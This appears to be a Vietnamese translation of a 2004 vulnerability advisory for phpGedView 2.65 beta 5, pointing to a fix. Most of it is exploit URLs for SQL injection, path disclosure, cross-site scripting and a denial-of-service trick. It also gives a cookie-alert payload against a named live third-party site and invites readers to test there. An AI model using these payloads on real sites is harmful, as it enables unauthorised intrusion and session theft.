Lỗi mới của phpGedView
trang này đã được đọc lầnLỗi này khác với lỗi Windak đã thông báo.
Date: 12 Jan 2004 22:54:04 -0000
From: JeiAr <security@gulftech.org>
Vendors: phpgedview.sourceforge.net
Dịch : Nhóm BinhTrieu ( Nhóm dịch ) - www.security.com.vn
Lỗi này được phát hiện trong phiên bản 2.65 beta 5
Miêu tả:
------------------
Nhiều lỗ hỗng đã được phát hiện trong phpGedView.người dùng từ xa có thể chèn
các dòng lệnh SQL,tấn công cross-site scripting,từ chối dịch vụ và xác định
đường dẫn cài đặt.
Lỗi nằm trong file 'timeline.php' và 'placelist.php' không thể cung cấp người
dùng hợp lệ vào biến $parent_id và $level .
Một số link khai thác :
/placelist.php?level=1[Evil_Query]
/placelist.php?level=1&parent[0]=[Evil_ Query]
/placelist.php?level=2&parent[0]=&parent[1]=[Evil_Query]
/timeline.php?pids=[Evil_Query]
[Evil_Query] <--------chỉ câu truy vấn nguy hiểm.
Xác định đường dẫn cài đặt :
indilist.php?alpha=\&surname_sublist=\
/famlist.php?alpha=(&surname_sublist= yes&surname=\
/placelist.php?level=1&parent[Blah]=
/imageview.php?zoomval=blah
/imageview.php?filename=/
/timeline.php?pids[Blah]=
/clippings.php?action=add&id=Blah
/login.php?action=login
/login.php?&changelanguage=yes&NEWLANGUAGE=Blah
/gdbi.php?action=connect&username=Blah
Tấn công cross-site scripting :
/descendancy.php?pid=<iframe>
/index.php?rootid="><iframe>
/individual. php?pid="><iframe>
/login.php?url=/index.php?GEDCOM="><iframe>
/relationship.php?path_to_find="><iframe>
/relationship.php?path_to_find=0&pid1="><iframe>
/relationshi p.php?path_to_find=0&pid1=&pid2="><iframe>
/source.php?sid=<iframe>
/imageview.php?filename=<iframe>
/calendar.php?action=today&day=1&month=jan&year="><iframe>
/calen dar.php?action=today&day=1&month=<iframe>
/calendar.php?action=today&day=<iframe>
/gedrecord.php?pid=<iframe>
/login.php?action=login&username="><iframe>
/login.php?& changelanguage=yes&NEWLANGUAGE=<iframe>
/gdbi_interface.php?action=delete&pid=<iframe>
Ngoài ra kẻ tấn công còn có thể tạo một link và lừa cho victim click vào,kết
quả là victim không thể truy cập vào website phpGedView được chỉ định cho đến
khi chọn lại ngôn ngữ và cookies.Khai thác như sau:
/login.php?&changelanguage=yes&NEWLANGUAGE=[Junk_Here]
Ví dụ :
http://www.compusaff.com/phpGedView/descendancy.php?pid=<script>alert(document.cookie)</script>
Bạn có thể test qua site trên
Giải pháp:
----------------
Bản sữa lỗi beta đã có tại:
http://sourceforge.net/project/showfiles.php?g